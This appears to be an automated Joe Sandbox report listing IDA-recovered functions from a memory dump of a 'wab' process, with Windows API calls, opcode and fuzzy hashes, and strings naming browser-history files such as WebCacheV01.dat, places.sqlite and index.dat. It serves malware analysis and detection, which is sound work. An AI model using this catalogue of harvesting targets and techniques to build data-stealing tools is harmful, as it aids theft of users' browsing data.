• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memcmp
• String ID: @ $SQLite format 3
• API String ID: 1475443563-3708268960

APIs
  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
• memset.MSVCRT ref: 00414C87
• RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
• wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: AddressCloseProcVersionmemsetwcscpy
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• API String ID: 2705122986-2036018995

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcsicmpqsort
                                                                                                                                                                                                          • String ID: /nosort$/sort
                                                                                                                                                                                                          • API String ID: 1579243037-1578091866
                                                                                                                                                                                                          • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                          • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                                                                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                          • API String ID: 3354267031-2114579845
                                                                                                                                                                                                          • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                          • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                                                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                          • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                          • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                          • API String ID: 2221118986-1725073988
                                                                                                                                                                                                          • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ChangeCloseFindNotificationSleep
                                                                                                                                                                                                          • String ID: }A
                                                                                                                                                                                                          • API String ID: 1821831730-2138825249
                                                                                                                                                                                                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@DeleteObject
                                                                                                                                                                                                          • String ID: r!A
                                                                                                                                                                                                          • API String ID: 1103273653-628097481
• Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
• Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
• Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
• Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ??2@
• String ID:
• API String ID: 1033339047-0
• Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
• Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
• Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
• Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
• memcmp.MSVCRT ref: 00444BA5
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$memcmp
• String ID: $$8
• API String ID: 2808797137-435121686
• Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
• Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
• Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
• Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
  • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
• FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
  • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
• DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
• CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
• String ID:
• API String ID: 1042154641-0
• Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
• Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
• Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
• Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
  • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
• GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
• ??3@YAXPAX@Z.MSVCRT ref: 00418803
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
• String ID:
• API String ID: 2947809556-0
• Opcode ID: 9c8f7abab99d1da351ac3b6f8ce72ab423c1774e4fe74519c125927a022e4df4
• Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
• Opcode Fuzzy Hash: 9c8f7abab99d1da351ac3b6f8ce72ab423c1774e4fe74519c125927a022e4df4
• Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
• memset.MSVCRT ref: 00403A55
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
• String ID: history.dat$places.sqlite
• API String ID: 3093078384-467022611
• Opcode ID: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
• Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
• Opcode Fuzzy Hash: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
• Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
• ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
• GetLastError.KERNEL32 ref: 00417627
Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 839530781-0
                                                                                                                                                                                                          • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                          • String ID: *.*$index.dat
                                                                                                                                                                                                          • API String ID: 1974802433-2863569691
                                                                                                                                                                                                          • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                          • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@mallocmemcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3831604043-0
                                                                                                                                                                                                          • Opcode ID: 2a092ad8f2336585ed98353820426f0e3c8ffb733fb9aa85e0df6135544c2253
                                                                                                                                                                                                          • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a092ad8f2336585ed98353820426f0e3c8ffb733fb9aa85e0df6135544c2253
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1156039329-0
                                                                                                                                                                                                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$ChangeCloseCreateFindNotificationTime
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1631957507-0
                                                                                                                                                                                                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1125800050-0
                                                                                                                                                                                                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                          • Opcode ID: 8b82e4f5ef2bc7d58288eb7d352e73fde76eaac7bad66d9443978647085fe40b
                                                                                                                                                                                                          • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b82e4f5ef2bc7d58288eb7d352e73fde76eaac7bad66d9443978647085fe40b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                                          Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
